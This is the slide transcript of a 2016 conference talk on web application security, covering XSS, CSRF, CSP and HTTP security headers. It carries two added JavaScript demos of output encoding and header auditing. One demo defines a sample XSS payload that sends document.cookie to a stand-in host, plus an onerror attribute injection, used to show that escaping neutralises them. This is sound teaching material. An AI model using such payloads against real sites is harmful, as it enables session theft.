
Beyond Scanning

Dheeraj Joshi
November 15, 2016

Slides from my talk at SeleniumConf UK 2016!

Transcript

  1. Let’s talk Security
    Beyond Scanning
    Dheeraj Joshi
    @dheerajhere

  2. About Me
    ● Front-End @
    ● Previously @
    ● Open Source (medium-cli)
    ● Ambidextrous TT Player

  3. What makes me happy?
    Uber, CKEditor, Dropbox,
    MailChimp, Recruiterbox, InVision,
    DigitalOcean, Intuit, Groupon, etc.
    More...

  4. In this talk...
    ● Why?
    ● Cross-site Scripting (XSS)
    ● Cross-site Request Forgery (CSRF)
    ● Content Security Policy (CSP)
    ● HTTP Security Headers
    ● Best Practices & Demo

  5. Why should we care about Security?
    Startups & SMEs are known to cut corners.
    One of the first things they cut is 'Security'.

  6. (image-only slide)

  7. (image-only slide)

  8. (image-only slide)

  9. Password Reuse Attacks

  10. The Shutdown
    HACKER PUTS HOSTING SERVICE “CODE SPACES” OUT OF BUSINESS

  11. CROSS SITE SCRIPTING - XSS
    ● XSS attacks users
    ● Injects malicious content
    ● Exploits can be really bad

  12. What is XSS?
    Typical Reflected XSS

  13. Stored XSS

  14. DOM XSS

  15. Hunt...
    ● Data <-> Code
    ● Input Validation
    ● Check HTML Encoding
    ● Sanitizers
    ● Analyze places where DOM elements are created
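The "Data <-> Code" and "Check HTML Encoding" points above, as an added example that is not part of the deck: a reflected XSS through string concatenation (slide 12), the output-encoding fix, and a second case in attribute context to show that the fix depends on where the value lands. Runs under Node.js; the payloads and the tiny attribute tokenizer are constructed for the demo and are not the author's code.

```javascript
// Added example, not from the deck: reflected XSS through string concatenation
// (slide 12) and the "Check HTML Encoding" fix from slide 15. Runs under Node.js;
// the payloads below are constructed for the demo.

// Encode the five characters that can break out of an HTML text node or a
// quoted attribute value. '&' goes first, otherwise we would double-encode.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: the query string lands in the page as markup (data becomes code).
function renderSearchVulnerable(q) {
  return `<p>Results for: ${q}</p>`;
}

// Fixed: the untrusted value is encoded for the HTML text context it lands in.
function renderSearchFixed(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Attribute context. Encoding only helps because the attribute is quoted; an
// unquoted src=${url} would accept `x onerror=alert(1)` with no special characters.
function renderAvatarVulnerable(url) {
  return `<img src="${url}" alt="avatar">`;
}
function renderAvatarFixed(url) {
  return `<img src="${escapeHtml(url)}" alt="avatar">`;
}

// Names of the attributes on the first tag in `html`, honouring quotes the way a
// browser does. Enough for this demo, not a general HTML parser (constructed helper).
function attributeNames(html) {
  const tag = /<\w+\s([^>]*?)\/?>/.exec(html);
  if (!tag) return [];
  const names = [];
  const attr = /([^\s=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let m;
  while ((m = attr.exec(tag[1])) !== null) names.push(m[1].toLowerCase());
  return names;
}

function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payloads: a cookie-stealing script for the text context and an
// attribute break-out for the img tag.
const TEXT_PAYLOAD = '<script>location="https://evil.example/?c="+document.cookie</script>';
const ATTR_PAYLOAD = 'x" onerror="alert(1)';

function xssDemo() {
  return {
    vulnerableTextRunsScript: hasScriptTag(renderSearchVulnerable(TEXT_PAYLOAD)),  // true
    fixedTextRunsScript: hasScriptTag(renderSearchFixed(TEXT_PAYLOAD)),            // false
    vulnerableImgAttributes: attributeNames(renderAvatarVulnerable(ATTR_PAYLOAD)), // ['src','onerror','alt']
    fixedImgAttributes: attributeNames(renderAvatarFixed(ATTR_PAYLOAD)),           // ['src','alt']
  };
}

console.log(xssDemo());
```

Encoding is the right tool when the value is data; when users are allowed to submit markup (comments, rich text), encoding would destroy it and a sanitizer with an allow-list is the tool instead, which is the "Sanitizers" bullet. For DOM XSS the same rule applies client-side: assign untrusted strings with `textContent` or `createTextNode`, not `innerHTML`.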

  16. XSS via template injection
    Using Sandbox Bypasses
    http://blog.portswigger.net/2016/04/adapting-angularjs-payloads-to-exploit.html

  17. ● Check for HttpOnly, Secure flag on Session Cookie

  18. CROSS-SITE REQUEST FORGERY (CSRF)

  19. CSRF Attacks
    Because the attack is carried out
    by the victim, CSRF can bypass:
    ● HTTP Auth
    ● Session-based auth
    ● Firewalls

  20. “CSRF Myths”
    Preventions that Won’t work
    ● Only accepting POST requests
    ● Referer Protection
    ● Multi-Step Transactions
    ● URL Rewriting
    ● application/json

  21. XSS + CSRF = ?

  22. Content Security Policy (CSP)
    CSP Evaluator (https://csp-evaluator.withgoogle.com)

  23. HTTP Security headers
    ● Strict-Transport-Security: max-age=16070400; includeSubDomains
    ● X-Frame-Options: deny
    ● X-XSS-Protection: 1; mode=block
    ● X-Content-Type-Options: nosniff
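Slides 17, 22 and 23 together describe what to look for in one HTTP response: cookie flags, a CSP that does not undo itself, and the headers listed above. The following is an added example, not the deck's or the CSP Evaluator's code: a small audit that takes a response header object and returns findings, run against a constructed weak response and a constructed hardened one. Runs under Node.js; the three CSP checks mirror a subset of what csp-evaluator reports and are not a full reimplementation.

```javascript
// Added example, not from the deck: one audit function covering slide 17
// (cookie flags), slide 22 (a few of the checks CSP Evaluator performs) and
// slide 23 (the security headers). Node.js; both sample responses are constructed.

// Parse "directive src src; directive src" into { directive: [src, ...] }.
function parseCsp(value) {
  const policy = {};
  for (const part of value.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) policy[tokens[0].toLowerCase()] = tokens.slice(1).map((t) => t.toLowerCase());
  }
  return policy;
}

// Three of the findings csp-evaluator reports; each one lets an XSS payload
// that got past output encoding still execute.
function auditCsp(value) {
  const findings = [];
  const policy = parseCsp(value);
  const scriptSrc = policy['script-src'] || policy['default-src'];
  if (!scriptSrc) return ['CSP: neither script-src nor default-src set, scripts unrestricted'];
  const hasNonceOrHash = scriptSrc.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  if (scriptSrc.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("CSP: 'unsafe-inline' in script-src, injected inline scripts run");
  }
  if (scriptSrc.includes('*') || scriptSrc.includes('https:')) {
    findings.push('CSP: script-src allows any host, attacker-hosted scripts load');
  }
  if (!policy['object-src'] && !policy['default-src']) {
    findings.push('CSP: no object-src, plugin content can execute script');
  }
  return findings;
}

// Slide 17: the session cookie must be HttpOnly (XSS cannot read it) and Secure
// (never sent over plain HTTP).
function auditCookie(setCookie) {
  const [nameValue, ...attrs] = setCookie.split(';').map((s) => s.trim());
  const name = nameValue.split('=')[0];
  const flags = new Set(attrs.map((a) => a.toLowerCase()));
  const findings = [];
  if (!flags.has('httponly')) findings.push(`Cookie ${name}: missing HttpOnly`);
  if (!flags.has('secure')) findings.push(`Cookie ${name}: missing Secure`);
  return findings;
}

const MIN_HSTS_AGE = 15552000; // 180 days; the preload list wants a full year

// `headers` is a plain object as Node's http module exposes it; Set-Cookie may be an array.
function auditHeaders(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const findings = [];

  const hsts = h['strict-transport-security'];
  if (!hsts) findings.push('Missing Strict-Transport-Security');
  else {
    const age = /max-age=(\d+)/i.exec(hsts);
    if (!age || Number(age[1]) < MIN_HSTS_AGE) findings.push('HSTS max-age shorter than 180 days');
    if (!/includesubdomains/i.test(hsts)) findings.push('HSTS without includeSubDomains');
  }
  const csp = h['content-security-policy'] || '';
  if (!h['x-frame-options'] && !/frame-ancestors/i.test(csp)) findings.push('Missing X-Frame-Options (clickjacking)');
  if ((h['x-content-type-options'] || '').toLowerCase() !== 'nosniff') findings.push('Missing X-Content-Type-Options: nosniff');
  if (!csp) findings.push('Missing Content-Security-Policy');
  else findings.push(...auditCsp(csp));
  for (const cookie of [].concat(h['set-cookie'] || [])) findings.push(...auditCookie(cookie));
  return findings;
}

// Constructed sample responses: a typical unhardened app, and the same app with
// the headers from slide 23 plus a strict CSP and the cookie flags from slide 17.
const weakResponse = {
  'Content-Type': 'text/html',
  'Set-Cookie': ['session=abc123; Path=/'],
  'Content-Security-Policy': "default-src 'self'; script-src 'self' 'unsafe-inline' https:",
};
const hardenedResponse = {
  'Content-Type': 'text/html',
  'Strict-Transport-Security': 'max-age=16070400; includeSubDomains',
  'X-Frame-Options': 'deny',
  'X-Content-Type-Options': 'nosniff',
  'Content-Security-Policy': "default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'; object-src 'none'; frame-ancestors 'none'",
  'Set-Cookie': ['session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'],
};

console.log(auditHeaders(weakResponse));      // seven findings
console.log(auditHeaders(hardenedResponse));  // []
```

X-XSS-Protection from the slide is deliberately not audited: it controlled the browsers' built-in XSS auditor, which Chrome and Edge have since removed and Firefox never shipped, so today the header buys nothing and CSP does that job. The `frame-ancestors` directive is accepted as an alternative to X-Frame-Options because browsers that support it give it precedence.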

  24. Defense
    ● Strategy - Integrate into SDLC
    ● Static Code Analysis
    ● Security Audits
    ● CTFs

  25. Show Time !

  26. Questions ?

  27. Thank you
    @dheerajhere
    @djadmin
